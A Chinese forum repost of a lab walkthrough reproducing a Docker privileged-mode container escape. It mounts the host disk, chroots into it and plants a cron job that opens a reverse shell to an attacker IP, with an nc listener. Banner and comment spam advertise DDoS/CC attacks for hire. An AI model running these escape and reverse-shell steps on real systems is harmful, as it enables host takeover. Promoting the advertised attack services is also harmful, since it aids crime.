登录/ 注册
 找回密码
 立即注册
关闭

CSDN热搜

程序园 精品问答 技术交流 资源下载
返回列表 发新帖
首页 业界区 科技 [docker逃逸] Privileged 特权模式逃逸复现

[docker逃逸] Privileged 特权模式逃逸复现

颜清华 2025-6-9 16:00:49
猛犸象科技工作室:网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
本文作者CVE-柠檬i
CSDN:https://blog.csdn.net/weixin_49125123
博客园:https://www.cnblogs.com/CVE-Lemon
微信公众号:Lemon安全
简述

在 Docker 中,Privileged 特权模式赋予容器几乎与宿主机相同的权限,允许其访问所有设备和内核功能。这种模式虽然提供了灵活性,但也带来了安全风险,可能导致容器逃逸,即攻击者从容器内获取宿主机权限。
环境配置

以特权模式创建容器
  1. docker pull centos
  2. docker run -itd --privileged centos /bin/bash
复制代码
1.png

查看当前是否为docker环境:
  1. cat /proc/1/cgroup|grep docker
复制代码
2.png

systemd-detect-virt 也可以判断当前是否为容器
  1. systemd-detect-virt
复制代码
3.png

查看当前是否为特权模式
  1. capsh --print
复制代码
  1. cat /proc/self/status | grep CapEff
复制代码
4.png

CapEff为0000001fffffffff,当前容器为特权模式。
复现

使用lsblk查看磁盘
5.png

挂载宿主机根目录
  1. mkdir test
  2. mount /dev/sds3 test
复制代码
挂载成功
6.png

使用chroot切换根目录,方便进行计划任务反弹shell
  1. chroot test
复制代码
7.png

创建计划任务
  1. crontab -e
复制代码
  1. */1 * * * *  /bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.171.1/8080 0>&1"
复制代码
8.png

攻击机监听反弹shell,成功反弹了宿主机的shell
  1. nc -lvvp 8080
复制代码
9.png


来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
逃逸dockerPrivileged特权模式

使用道具 举报

相关推荐
豌笆
2025-10-17 08:33:53

举报

猛犸象科技工作室:网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
谢谢楼主提供!
扎先
2025-10-17 13:23:40

举报

程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
过来提前占个楼
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册
发帖
颜清华
2025-10-17 13:23:40

0

粉丝关注

23

主题发布

板块介绍填写区域,请于后台编辑
微信扫一扫